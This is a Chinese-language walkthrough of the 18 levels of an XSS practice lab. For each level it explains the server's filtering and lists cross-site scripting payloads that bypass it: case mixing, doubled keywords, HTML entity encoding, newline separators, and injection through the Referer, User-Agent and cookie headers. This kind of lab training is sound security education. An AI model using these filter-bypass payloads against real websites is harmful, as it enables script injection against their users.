在线靶场:http://test.xss.tv/
源码:https://pan.baidu.com/s/1zS2GwTNbMBXEF2yNEBeLgA 密码:85g8
靶场首页是这样的:
第一关
没有任何过滤.
payload:
<script>alert(1)</script>
<svg/onload=alert(1)>
<script>prompt("完成的不错!")</script>
<script>confirm("完成的不错!")</script>
第二关
htmlspecialchars()函数把预定义的字符转换为 HTML 实体。
预定义的字符是:
& (和号)成为 &
" (双引号)成为 "
' (单引号)成为 '
< (小于)成为 <
> (大于)成为 >
如需把特殊的 HTML 实体转换回字符,使用htmlspecialchars_decode()函数。
htmlspecialchars()只在输出点过滤,并没有在输入点过滤。
payload:
" onclick=alert(2) // 点击搜索框弹框
" onmouseover=alert(1)> //鼠标划过输入框弹框
"><script>alert(2)</script>
"><script>prompt("完成的不错!")</script>
"><script>confirm("完成的不错!")</script>
第三关
输入点和输出点都做了过滤。
payload:
‘ oninput=alert`3`
‘ oninput=alert`3` // 输入后,再在弹框输入字符
' oninput=alert`1` '
' onchange=alert`1` // 输入后,再在弹框输入字符并点击搜索
' onchange=alert`1` '
第四关
将输入输入中的<>置空。
将第三关前面用来闭合的单引号改成双引号即可。
payload:
" oninput=alert`3` // (输入后,再在弹框输入字符)
" oninput=alert`1` '
" onchange=alert`1` // (输入后,再在弹框输入字符并点击搜索)
" onchange=alert`1` '
第五关
首先将输入内容全部转换为小写,然后如果检测有<script就转换为<scr_ipt,再检测如果有on就转换为o_n
不让用<script>和事件了,这里用链接绕过。
payload:
"><a href="javascript:alert(1)">
"> <a href="javascript:alert('xss')">111</a> //
第六关
过滤<script、on、src、data、href,但是过滤前没有使用strtolower()全部转换成小写。可以大小写绕过。
payload:
"><ScRipt>prompt(6)</script>
" oNchange=alert(6) //
" Oninput=alert(6) //
"><img Src=x Onerror=alert(6)> //
第七关
这关使用了strtolower函数,不能大小写绕过了,不过检测到关键字后置空,可以使用双写绕过。
payload:
"><sscriptcript>alert(7)</scscriptript>
" oonnchange=alert`7` //
"><img ssrcrc=x oonnerror=alert(6)> //
"> <a hrhrefef="javascscriptript:alert('xss')">111</a> //
第八关
输入点使用htmlspecialchars函数过滤,不能双写绕过,不能大小写绕过,过滤了双引号。可以编码绕过,使用HTML实体编码。
payload:
javascript:alert(1)转换为HTML实体:
javascript:alert(1)
由于过滤的是script,也可以只转换script:
javascript:alert(7)
输入完提交,然后点友情链接即可。
第九关
strpos() 函数查找字符串在另一字符串中第一次出现的位置。(对大小写敏感)
相关函数:
stripos() - 查找字符串在另一字符串中第一次出现的位置(不区分大小写)
strripos() - 查找字符串在另一字符串中最后一次出现的位置(不区分大小写)
strrpos() - 查找字符串在另一字符串中最后一次出现的位置(区分大小写)
和第8关过滤一样,区别是这关还会检查输入数据中是否有http://。
payload:
javascript:alert("http:// ")
转换HTML实体:
javascript:alert("http:// ")
也可以只保留http://,剩下的全部转换为html实体:
javascript:alert("http://")
第十关
t_sort没有进行过滤但是被隐藏了,不过并不影响传参。
payload:
url=&t_sort=" type="text" onclick="alert()
?t_sort=4" onclick=alert(1) type="text"
?keyword=888888&t_sort=" type="" onclick="alert()
?keyword=well done!&t_sort=" onmouseover=alert(1) type="text"
?keyword=well done!&t_sort=8888" type="text" onmouseover="alert(666)
第十一关
获取http头中referer的值,所以在referer中写就好了。
payload:
" onmouseover=alert(11) type="text"
第十二关
和11关思路一样,这次是在user-agent
payload:
" onmouseover=alert(12) type=""
第十三关
在cookie中注入
payload:
" onmouseover=alert(13) type=""
第十四关
14关有些问题,看一些大佬的教程应该会有个上传文件的功能,但是这里什么都没有显示出来。
这关是利用修改exif信息,在exif信息中写入xss代码,然后上传上去,别人点击这个图片就会中招。可以去乌云镜像站看一下案例,关键字:exif
第十五关
这关用到了ng-include,直接在包含的页面里用 <script> 触发不了,用了img标签。
遵循SOP,只好调用第一关代码。需要单引号包裹,否则变成注释。
这关看大佬的payload是这样的:level15.php?src='level1.php?name=test<img src=1 onerror=alert(1)>',但是我没做出来
第十六关
先将输入字符转换为小写,然后过滤script、空格、/
用%0d、%0a代替空格做分割符。
payload:
keyword=<img%0Dsrc=a%0Aonerror=alert(16)>
keyword=<svg%0aonload=alert`1`></svg>
第十七关
输出点在url中,被htmlspecialchars()函数过滤了一遍,用事件。
payload:
level17.php?arg01=a&arg02=b onmouseover=alert(18)
第十八关
感觉和17关没什么区别
payload:
level18.php?arg01=a&arg02=b onmouseout=alert(1)
